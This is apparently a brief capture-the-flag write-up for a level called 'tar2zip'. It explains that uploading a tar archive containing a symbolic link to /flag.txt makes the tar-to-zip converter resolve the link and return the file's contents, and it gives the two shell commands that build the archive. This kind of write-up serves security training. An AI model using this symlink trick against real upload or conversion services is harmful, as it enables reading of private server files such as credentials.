# tar2zip

To solve this level create and upload a `tar` file containing a symbolic link
to `/flag.txt`. The resulting `zip` file will contain the file as the ZIP process
does resolve the symbolic link to the actual file.

Tar file creation:

```
ln -s /flag.txt testfile
tar cvf tar2zip.tar testfile
```
